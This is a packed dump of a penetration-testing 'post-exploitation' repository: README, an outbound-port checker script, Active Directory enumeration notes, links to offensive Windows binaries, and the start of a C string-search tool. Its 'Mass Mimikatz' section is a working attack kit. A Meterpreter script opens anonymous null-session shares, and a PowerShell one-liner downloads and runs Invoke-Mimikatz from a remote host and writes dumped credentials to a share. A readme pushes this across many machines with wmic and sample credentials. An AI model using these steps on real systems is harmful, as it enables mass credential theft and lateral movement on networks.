├── .github
└── FUNDING.yml
├── .gitignore
├── README.md
├── scripts
├── getout.py
├── mass_mimikatz
│ ├── massmimi_reg.rb
│ ├── powermeup.cmd
│ └── readme.md
├── powershell
│ └── list_local_admins_remote_hosts.ps1
└── readme.md
├── win32bins
├── LGPO.exe
├── RunAsCurrentUser-2.0.3.1.exe
├── activedirectory
│ ├── VSSVC.exe
│ ├── adfind.exe
│ ├── bitsadmin32.exe
│ ├── csvde.exe
│ ├── dnscmd.exe
│ ├── dsget.exe
│ ├── dsquery.exe
│ ├── nltest32.exe
│ ├── readme.md
│ └── vssadmin.exe
├── binary
│ ├── bintext.exe
│ ├── rar.exe
│ ├── sdelete.exe
│ ├── strings.exe
│ └── upx.exe
├── database
│ ├── gui
│ │ ├── heidisql.exe
│ │ └── libmysql.dll
│ ├── osql.exe
│ └── sqlcmd.exe
├── dmc.exe
├── grep.exe
├── gui
│ ├── baregrep.exe
│ ├── baretail.exe
│ ├── hxd.exe
│ ├── scite.exe
│ └── servifythis.exe
├── mygrep
│ ├── mygrep.c
│ ├── mygrep.exe
│ ├── scan.h
│ └── show_dump.h
├── network
│ ├── letmeoutofyournet
│ │ ├── w00tw00t_incremental.au3
│ │ └── w00tw00t_incremental.exe
│ ├── ncat.exe
│ ├── plink.exe
│ ├── plink_novrfy.exe
│ ├── readme.creole
│ ├── remote.exe
│ ├── sbd.exe
│ ├── showmount.exe
│ ├── tcping.exe
│ ├── wget.exe
│ └── zebedee.exe
├── ntrights.exe
├── privesc.exe
├── psexec.exe
├── rawcap.exe
├── regedit_nogpo.exe
└── requires_cygwin
│ ├── cygcrypto-0.9.8.dll
│ ├── cyggcc_s-1.dll
│ ├── cygminires.dll
│ ├── cygssp-0.dll
│ ├── cygwin1.dll
│ ├── cygz.dll
│ ├── scp.exe
│ ├── ssh-agent.exe
│ ├── ssh-keygen.exe
│ └── ssh.exe
└── win64bins
├── bitsadmin64.exe
├── dsacls.exe
├── en-US
└── dsacls.exe.mui
├── nltest64.exe
├── runhash64.exe
├── showmount.exe
└── wce64.exe
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | patreon: mubix
2 | liberapay: mubix
3 | custom: ['https://paypal.me/mubix']
4 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | #################
3 | ## Eclipse
4 | #################
5 |
6 | *.pydevproject
7 | .project
8 | .metadata
9 | bin/**
10 | tmp/**
11 | tmp/**/*
12 | *.tmp
13 | *.bak
14 | *.swp
15 | *~.nib
16 | local.properties
17 | .classpath
18 | .settings/
19 | .loadpath
20 |
21 | # External tool builders
22 | .externalToolBuilders/
23 |
24 | # Locally stored "Eclipse launch configurations"
25 | *.launch
26 |
27 | # CDT-specific
28 | .cproject
29 |
30 | # PDT-specific
31 | .buildpath
32 |
33 |
34 | #################
35 | ## Visual Studio
36 | #################
37 |
38 | ## Ignore Visual Studio temporary files, build results, and
39 | ## files generated by popular Visual Studio add-ons.
40 |
41 | # User-specific files
42 | *.suo
43 | *.user
44 | *.sln.docstates
45 |
46 | # Build results
47 | **/[Dd]ebug/
48 | **/[Rr]elease/
49 | *_i.c
50 | *_p.c
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.vspscc
65 | .builds
66 | **/*.dotCover
67 |
68 | ## TODO: If you have NuGet Package Restore enabled, uncomment this
69 | #**/packages/
70 |
71 | # Visual C++ cache files
72 | ipch/
73 | *.aps
74 | *.ncb
75 | *.opensdf
76 | *.sdf
77 |
78 | # Visual Studio profiler
79 | *.psess
80 | *.vsp
81 |
82 | # ReSharper is a .NET coding add-in
83 | _ReSharper*
84 |
85 | # Installshield output folder
86 | [Ee]xpress
87 |
88 | # DocProject is a documentation generator add-in
89 | DocProject/buildhelp/
90 | DocProject/Help/*.HxT
91 | DocProject/Help/*.HxC
92 | DocProject/Help/*.hhc
93 | DocProject/Help/*.hhk
94 | DocProject/Help/*.hhp
95 | DocProject/Help/Html2
96 | DocProject/Help/html
97 |
98 | # Click-Once directory
99 | publish
100 |
101 | # Others
102 | [Bb]in
103 | [Oo]bj
104 | sql
105 | TestResults
106 | *.Cache
107 | ClientBin
108 | stylecop.*
109 | ~$*
110 | *.dbmdl
111 | Generated_Code #added for RIA/Silverlight projects
112 |
113 | # Backup & report files from converting an old project file to a newer
114 | # Visual Studio version. Backup files are not needed, because we have git ;-)
115 | _UpgradeReport_Files/
116 | Backup*/
117 | UpgradeLog*.XML
118 |
119 |
120 |
121 | ############
122 | ## Windows
123 | ############
124 |
125 | # Windows image file caches
126 | Thumbs.db
127 |
128 | # Folder config file
129 | Desktop.ini
130 |
131 |
132 | #############
133 | ## Python
134 | #############
135 |
136 | *.py[co]
137 |
138 | # Packages
139 | *.egg
140 | *.egg-info
141 | dist
142 | build
143 | eggs
144 | parts
145 | bin
146 | var
147 | sdist
148 | develop-eggs
149 | .installed.cfg
150 |
151 | # Installer logs
152 | pip-log.txt
153 |
154 | # Unit test / coverage reports
155 | .coverage
156 | .tox
157 |
158 | #Translations
159 | *.mo
160 |
161 | #Mr Developer
162 | .mr.developer.cfg
163 |
164 | # Mac crap
165 | .DS_Store
166 |
167 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | post-exploitation
2 | =================
3 |
4 | Post Exploitation Collection - This repository is a collection of the post
5 | exploitation voodoo from too many sources to name. The command lists are below
6 | but binaries and scripts have been added to the repo as well. See below for
7 | detail on each of the sections.
8 |
9 | **If you'd like to contribute or just correct a
10 | typo please create a pull request, or complain
11 | at me via the 'issues' system**
12 |
13 | Contributors: [@mubix](http://twitter.com/mubix),yournamehere
14 |
15 | Command Lists
16 | -------------
17 | Post Exploitation commands lists - these were originally a Google Doc as linked
18 | here but have been converted to GitHub markdown. You can now access them via the
19 | Wiki here: https://github.com/mubix/post-exploitation/wiki and check it out locally
20 | for editing using:
21 | ```bash
22 | git clone git@github.com:mubix/post-exploitation.wiki.git
23 | ```
24 |
25 | ### Old lists:
26 | * [Linux/Unix/BSD Post Exploitation](https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit)
27 | * [Windows Post Exploitation](https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit)
28 | * [OSX Post Exploitation](https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit)
29 | * [Obsucure Syststem's Post Exploitation](https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit)
30 | * [Metasploit Post Exploitation](https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit)
31 |
32 | Disclaimer
33 | ----------
34 | If you are the owner of one of these binaries and
35 | would like it taken down, please create an issue
36 | on Github and it will be removed.
37 |
38 | .msf4 & metasploit scripts
39 | ------
40 | This has moved to "Q" - https://github.com/mubix/q
41 |
42 | win32bins
43 | ----------
44 | 32 or 16 bit binaries - not only for use on 32 bit systems but any that have
45 | a counterpart in win64bins probably have it for a reason
46 |
47 | scripts
48 | --------
49 | All other scripts that don't fit in one of the above categories
50 |
51 | linux
52 | --------
53 | All other *nix related items that don't fit in one of the above categories
54 |
55 | osx
56 | -----
57 | All other OSX related items that don't fit in one of the above categories
58 |
59 | bsd
60 | ----
61 | All other BSD related items that don't fit in one of the above categories
62 |
--------------------------------------------------------------------------------
/scripts/getout.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python -tt
2 |
3 | import sys, socket, urllib2, threading, Queue
4 |
5 | #=================================================
6 | # MAIN FUNCTION
7 | #=================================================
8 |
9 | def main():
10 | import optparse
11 | usage = "%prog [options]\n\n%prog - Tim Tomes (@LaNMaSteR53) (www.lanmaster53.com)"
12 | parser = optparse.OptionParser(usage=usage)
13 | parser.add_option('-v', help='Enable verbose mode.', dest='verbose', default=False, action='store_true')
14 | parser.add_option('-p', help='Port, or range of ports (1-65535).', dest='ports', type='string', action='store')
15 | parser.add_option('-t', help='Number of threads. (default=5)', dest='threads', type='int', default=5, action='store')
16 | (opts, args) = parser.parse_args()
17 |
18 | if not opts.ports:
19 | parser.error("[!] Must provide at least one port.")
20 | else:
21 | ports = opts.ports
22 | verbose = False
23 | if opts.verbose: verbose = opts.verbose
24 | socket.setdefaulttimeout(3)
25 |
26 | print "[*] Checking egress for ports %s." % ports
27 |
28 | if '-' in opts.ports:
29 | ports = range(int(opts.ports.split('-')[0]), int(opts.ports.split('-')[1])+1)
30 | else:
31 | ports = [int(opts.ports)]
32 |
33 | q = Queue.Queue()
34 | print_q = Queue.Queue()
35 |
36 | for i in range(opts.threads):
37 | t = threading.Thread(target=doWork, args=(q,print_q,verbose))
38 | t.daemon = True
39 | t.start()
40 |
41 | t = threading.Thread(target=doPrint, args=(print_q,))
42 | t.daemon = True
43 | t.start()
44 |
45 | for i in ports:
46 | q.put(i)
47 | q.join()
48 |
49 | #=================================================
50 | # SUPPORT FUNCTIONS
51 | #=================================================
52 |
53 | def doPrint(print_q):
54 | while True:
55 | output = print_q.get()
56 | print_q.task_done()
57 | print output
58 |
59 | def doWork(q, print_q, verbose):
60 | while True:
61 | port = q.get()
62 | #import pdb;pdb.set_trace()
63 | req = urllib2.Request('http://yo.letmeoutofyour.net:%d/hi/mubix' % port)
64 | try:
65 | res = urllib2.urlopen(req)
66 | if 'w00tw00t' in res.read():
67 | if verbose: print_q.put('[+] Port %d allowed.' % port)
68 | else:
69 | print_q.put('[!] \'w00tw00t\' not returned for port %d.' % port)
70 | except urllib2.URLError:
71 | print_q.put('[-] Port %d blocked.' % port)
72 | q.task_done()
73 |
74 | #=================================================
75 | # START
76 | #=================================================
77 |
78 | if __name__ == "__main__": main()
79 |
--------------------------------------------------------------------------------
/scripts/mass_mimikatz/massmimi_reg.rb:
--------------------------------------------------------------------------------
1 | sharename = 'open'
2 | regmultisz = 7
3 | regdword = 4
4 |
5 | key = 'HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\'
6 | rootkey, basekey = client.sys.registry.splitkey(key)
7 | open_key = client.sys.registry.open_key(rootkey,basekey,KEY_READ)
8 | begin
9 | v = open_key.query_value('NullSessionShares')
10 | open_key.close
11 | currentsetting = v.data.split("\x00\x00")[0].split("\x00")
12 |
13 | if currentsetting.include?(sharename)
14 | print_good("#{sharename} is already allowed as a NullSessionShare")
15 | else
16 | print_status("#{sharename} is not in the NullSessionShares list, adding...")
17 | open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
18 | if currentsetting.length > 0
19 | print_status("Current Settings #{print_error(currentsetting.inspect)}")
20 | csinsert = currentsetting.join("\x00") + "\x00"
21 | else
22 | print_status("NullSessionShares is present but blank..")
23 | csinsert = ""
24 | end
25 | open_key.set_value("NullSessionShares",regmultisz, csinsert + "#{sharename}\x00\x00")
26 | open_key.close
27 | end
28 | rescue Rex::Post::Meterpreter::RequestError
29 | print_status("NullSessionShares value isn't present, creating and adding #{sharename}")
30 | open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
31 | open_key.set_value("NullSessionShares",regmultisz,"#{sharename}\x00\x00")
32 | open_key.close
33 | end
34 |
35 | key = 'HKLM\\System\\CurrentControlSet\\Control\\Lsa'
36 | rootkey, basekey = client.sys.registry.splitkey(key)
37 | open_key = client.sys.registry.open_key(rootkey,basekey,KEY_READ)
38 | begin
39 | v = open_key.query_value('EveryoneIncludesAnonymous')
40 | open_key.close
41 | if v.data != 1
42 | print_status("EveryoneIncludesAnonymous currently set to #{v.data}, setting to: 1")
43 | open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
44 | open_key.set_value("EveryoneIncludesAnonymous",regdword,1)
45 | open_key.close
46 | else
47 | print_good("EveryoneIncludesAnonymous is already set correctly.")
48 | end
49 | rescue
50 | print_status("EveryoneIncludesAnonymous value isn't present, creating and setting to: 1")
51 | open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
52 | open_key.set_value("EveryoneIncludesAnonymous",regdword,1)
53 | open_key.close
54 | end
55 |
--------------------------------------------------------------------------------
/scripts/mass_mimikatz/powermeup.cmd:
--------------------------------------------------------------------------------
1 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
--------------------------------------------------------------------------------
/scripts/mass_mimikatz/readme.md:
--------------------------------------------------------------------------------
1 | # Mass Mimikatz
2 |
3 | 1. Make Share:
4 | ```
5 | cd\
6 | mkdir open
7 | net share open=C:\open /grant:everyone,full
8 | icacls C:\open\ /grant Everyone:(OI)(CI)F /t
9 | ```
10 |
11 | 2. Set registry keys ([massmimi_reg.rb](https://raw.github.com/mubix/post-exploitation/master/scripts/mass_mimikatz/massmimi_reg.rb) meterpreter script):
12 | ```
13 | reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open
14 | reg change HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" 1
15 | ```
16 |
17 | 3. Change directory into new "open" directory
18 |
19 | 4. Upload powershell script ([powermeup.cmd](https://raw.github.com/mubix/post-exploitation/master/scripts/mass_mimikatz/powermeup.cmd)):
20 | ```
21 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
22 | ```
23 |
24 | 5. Upload [clymb3r](http://clymb3r.wordpress.com/)'s Invoke-Mimikatz ps1 - Download from [PowerSploit](https://github.com/mattifestation/PowerSploit) repo: [source on github](https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1)
25 |
26 | 6. Upload mongoose: [Downloads Page](http://cesanta.com/downloads.html) - Both regular and tiny versions work
27 |
28 | 7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.
29 |
30 | 8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default
31 |
32 | 9. Execute wmic:
33 | ```
34 | wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
35 | ```
36 |
37 | 9a. Execute wmic with creds:
38 | ```
39 | wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
40 | ```
41 |
42 |
43 | ## clean up:
44 |
45 | 1. kill mongoose process
46 | 2. net share open /delete
47 | 3. kill registry values
48 | 4. delete "open" directory
49 |
--------------------------------------------------------------------------------
/scripts/powershell/list_local_admins_remote_hosts.ps1:
--------------------------------------------------------------------------------
1 | function get-localadmin {
2 | param ($strcomputer)
3 | $admins = Gwmi win32_groupuser -computer $strcomputer
4 | $admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}
5 | $admins |% {
6 | $_.partcomponent -match ".+Domain\=(.+)\,Name\=(.+)$" > $nul
7 | $matches[1].trim('"') + "\" + $matches[2].trim('"')
8 | }
9 | }
10 |
--------------------------------------------------------------------------------
/scripts/readme.md:
--------------------------------------------------------------------------------
1 | # Man page for scripts directory
2 |
3 | ## getout.py - date/version added (Aug 26 2012)
4 | ### src:
5 | http://ptscripts.googlecode.com/svn/trunk/getout.py
6 | ### description:
7 | Python script by Tim Tomes that uses LetMeOutOfYour.net
8 | to determine which ports are blocked outbound.
9 | ### usage (test first 1000 ports):
10 | python getout.py -p 1-1000
11 |
--------------------------------------------------------------------------------
/win32bins/LGPO.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/LGPO.exe
--------------------------------------------------------------------------------
/win32bins/RunAsCurrentUser-2.0.3.1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/RunAsCurrentUser-2.0.3.1.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/VSSVC.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/VSSVC.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/adfind.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/adfind.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/bitsadmin32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/bitsadmin32.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/csvde.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/csvde.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/dnscmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/dnscmd.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/dsget.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/dsget.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/dsquery.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/dsquery.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/nltest32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/nltest32.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/readme.md:
--------------------------------------------------------------------------------
1 | ## csvde.exe
2 | src: Windows server OS
3 |
4 | ### Usage
5 |
6 | >
7 | **Output most of the AD object for a domain into a CSV**
8 | csvde.exe -f domaindump.csv
9 | **Output just Marketing objects to CSV**
10 | csvde -d "ou=marketing,dc=contoso,dc=com" -f marketingobjects.csv
11 |
12 | ## dnscmd.exe
13 | src: Picked off any Windows server OS with DNS role installed
14 |
15 | ### Usage
16 |
17 | >
18 | **Enum available zones**
19 | dnscmd /EnumZones
20 | **Print entire zone**
21 | dnscmd /ZonePrint domain.com
22 | If these commands are not done on the DNS server, one can be specified between the command and option like so:
23 | dnscmd dc1.domain.com /EnumZones
24 |
25 | ## adfind.exe
26 | src: http://www.joeware.net/freetools/tools/adfind/index.htm
27 |
28 | ### Usage
29 |
30 | >
31 | **List all domains in forest**
32 | adfind -sc domainlist
33 | **List all the trusts for the current domain/forest**
34 | adfind -sc trustdmp
35 | **List domain controllers**
36 | adfind -sc dclist
37 | **Lists domain controllers for another domain**
38 | adfind -b dc=trusted,dc=otheraddomain,dc=clickycompany,dc=com -sc dclist
39 |
40 | ## nltest.exe
41 | src: Windows OS
42 |
43 | ### Usage
44 |
45 | >
46 | **List all domains current domain trusts**
47 | nltest /domain_trusts
48 |
--------------------------------------------------------------------------------
/win32bins/activedirectory/vssadmin.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/vssadmin.exe
--------------------------------------------------------------------------------
/win32bins/binary/bintext.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/bintext.exe
--------------------------------------------------------------------------------
/win32bins/binary/rar.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/rar.exe
--------------------------------------------------------------------------------
/win32bins/binary/sdelete.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/sdelete.exe
--------------------------------------------------------------------------------
/win32bins/binary/strings.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/strings.exe
--------------------------------------------------------------------------------
/win32bins/binary/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/upx.exe
--------------------------------------------------------------------------------
/win32bins/database/gui/heidisql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/gui/heidisql.exe
--------------------------------------------------------------------------------
/win32bins/database/gui/libmysql.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/gui/libmysql.dll
--------------------------------------------------------------------------------
/win32bins/database/osql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/osql.exe
--------------------------------------------------------------------------------
/win32bins/database/sqlcmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/sqlcmd.exe
--------------------------------------------------------------------------------
/win32bins/dmc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/dmc.exe
--------------------------------------------------------------------------------
/win32bins/grep.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/grep.exe
--------------------------------------------------------------------------------
/win32bins/gui/baregrep.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/baregrep.exe
--------------------------------------------------------------------------------
/win32bins/gui/baretail.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/baretail.exe
--------------------------------------------------------------------------------
/win32bins/gui/hxd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/hxd.exe
--------------------------------------------------------------------------------
/win32bins/gui/scite.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/scite.exe
--------------------------------------------------------------------------------
/win32bins/gui/servifythis.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/servifythis.exe
--------------------------------------------------------------------------------
/win32bins/mygrep/mygrep.c:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright 2012 Luigi Auriemma
3 |
4 | This program is free software; you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation; either version 2 of the License, or
7 | (at your option) any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program; if not, write to the Free Software
16 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17 |
18 | http://www.gnu.org/licenses/gpl-2.0.txt
19 | */
20 |
21 | #include
22 | #include
23 | #include
24 | #include
25 | #include
26 | #include "show_dump.h"
27 |
28 | #ifdef WIN32
29 | #include
30 | #else
31 | #define strnicmp strncasecmp
32 | #endif
33 |
34 | typedef unsigned char u8;
35 |
36 |
37 |
38 | #define VER "0.1"
39 |
40 |
41 |
42 | int cstring(u8 *input, u8 *output, int maxchars, int *inlen);
43 | u8 *base64_encode(u8 *data, int *size);
44 | u8 *byte2hex(u8 *data, int *size);
45 | int find(u8 *fname, u8 *buff, int buffsz, u8 *string, int stringsz, int adiacent, int case_sensitive);
46 | int mymemicmp(u8 *a, u8 *b, int len);
47 | u8 *fdload(u8 *fname, int *fsize);
48 | void std_err(void);
49 |
50 |
51 |
52 | int g_sparse = 0,
53 | g_sensitive = 0,
54 | verbose = 0;
55 | int g_stringsz = 0;
56 | u8 *g_string = NULL;
57 |
58 |
59 |
60 | #include "scan.h"
61 | int mygrep(u8 *fname);
62 |
63 |
64 |
65 | int main(int argc, char *argv[]) {
66 | static u8 filedir[4096];
67 | files_t *files;
68 | unsigned found;
69 | int i,
70 | input_total_files;
71 |
72 | fputs("\n"
73 | "mygrep " VER "\n"
74 | "by Luigi Auriemma\n"
75 | "e-mail: aluigi@autistici.org\n"
76 | "web: aluigi.org\n"
77 | "\n", stderr);
78 |
79 | if(argc < 3) {
80 | printf("\n"
81 | "Usage: %s [options] ...\n"
82 | "\n"
83 | "Options:\n"
84 | "-I case sensitive only\n"
85 | "-a allow the adiacent and sparse search too\n"
86 | "-v verbose\n"
87 | "\n", argv[0]);
88 | exit(1);
89 | }
90 |
91 | for(i = 1; i < argc; i++) {
92 | if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
93 | break;
94 | //printf("\nError: wrong argument (%s)\n", argv[i]);
95 | //exit(1);
96 | }
97 | switch(argv[i][1]) {
98 | case 'I': g_sensitive = 1; break;
99 | case 'a': g_sparse = 1; break;
100 | case 'v': verbose = 1; break;
101 | default: {
102 | printf("\nError: wrong argument (%s)\n", argv[i]);
103 | exit(1);
104 | }
105 | }
106 | }
107 |
108 | g_string = argv[i++];
109 | if(i >= argc) {
110 | printf("\nError: invalid options or missing arguments\n");
111 | exit(1);
112 | }
113 | g_string = strdup(g_string); // not necessary
114 | g_stringsz = cstring(g_string, g_string, -1, NULL);
115 |
116 | for(; i < argc; i++) {
117 | sprintf(filedir, "%.*s", sizeof(filedir) - 1, argv[i]);
118 | if(verbose) printf("- %s\n", filedir);
119 |
120 | if(recursive_dir(filedir, sizeof(filedir)) < 0) {
121 | // it's a file
122 | add_files(filedir, 0, NULL);
123 | }
124 | }
125 | files = add_files(NULL, 0, &input_total_files);
126 |
127 | found = 0;
128 | for(i = 0; i < input_total_files; i++) {
129 | found += mygrep(files[i].name);
130 | }
131 |
132 | fprintf(stderr, "\n- %u patterns found\n", found);
133 |
134 | for(i = 0; i < input_total_files; i++) {
135 | free(files[i].name);
136 | }
137 | free(files);
138 | return(0);
139 | }
140 |
141 |
142 |
143 | int mygrep(u8 *fname) {
144 | int i,
145 | tmpsz,
146 | buffsz,
147 | string16sz,
148 | found = 0;
149 | u8 *buff,
150 | *string16,
151 | *tmp;
152 |
153 | buff = fdload(fname, &buffsz);
154 | //if(!buff) std_err();
155 | if(!buff) { // useful to continue the scanning
156 | perror("\nError");
157 | return(0);
158 | }
159 |
160 |
161 | /*******************\
162 | |* provided string *|
163 | \*******************/
164 |
165 | found += find(fname, buff, buffsz, g_string, g_stringsz, 0, g_sensitive);
166 |
167 |
168 | /****************\
169 | |* utf16 string *|
170 | \****************/
171 |
172 | string16 = calloc(g_stringsz, sizeof(short));
173 | if(!string16) std_err();
174 | for(i = 0; i < g_stringsz; i++) {
175 | string16[i * 2] = g_string[i];
176 | string16[(i * 2) + 1] = 0;
177 | }
178 | string16sz = (i * 2) - 1; // big/little endian compatible
179 | found += find(fname, buff, buffsz, string16, string16sz, 0, g_sensitive);
180 |
181 |
182 | /**********\
183 | |* base64 *|
184 | \**********/
185 |
186 | tmpsz = g_stringsz;
187 | tmp = base64_encode(g_string, &tmpsz);
188 | found += find(fname, buff, buffsz, tmp, tmpsz, 0, g_sensitive);
189 | free(tmp);
190 |
191 | tmpsz = string16sz;
192 | tmp = base64_encode(string16, &tmpsz);
193 | found += find(fname, buff, buffsz, tmp, tmpsz, 0, g_sensitive);
194 | free(tmp);
195 |
196 |
197 | /*******\
198 | |* hex *|
199 | \*******/
200 |
201 | tmpsz = g_stringsz;
202 | tmp = byte2hex(g_string, &tmpsz);
203 | found += find(fname, buff, buffsz, tmp, tmpsz, 0, 0); // case insensitive
204 | free(tmp);
205 |
206 | tmpsz = string16sz;
207 | tmp = byte2hex(string16, &tmpsz);
208 | found += find(fname, buff, buffsz, tmp, tmpsz, 0, 0); // case insensitive
209 | free(tmp);
210 |
211 |
212 | if(g_sparse) {
213 | /************\
214 | |* adiacent *|
215 | \************/
216 |
217 | found += find(fname, buff, buffsz, g_string, g_stringsz, 10, g_sensitive);
218 |
219 |
220 | /**********\
221 | |* sparse *|
222 | \**********/
223 |
224 | found += find(fname, buff, buffsz, g_string, g_stringsz, -256, g_sensitive);
225 | }
226 |
227 | free(string16);
228 | free(buff);
229 | return(found);
230 | }
231 |
232 |
233 |
234 | int cstring(u8 *input, u8 *output, int maxchars, int *inlen) {
235 | int n,
236 | len;
237 | u8 *p,
238 | *o;
239 |
240 | if(!input || !output) {
241 | if(inlen) *inlen = 0;
242 | return(0);
243 | }
244 |
245 | p = input;
246 | o = output;
247 | while(*p) {
248 | if(maxchars >= 0) {
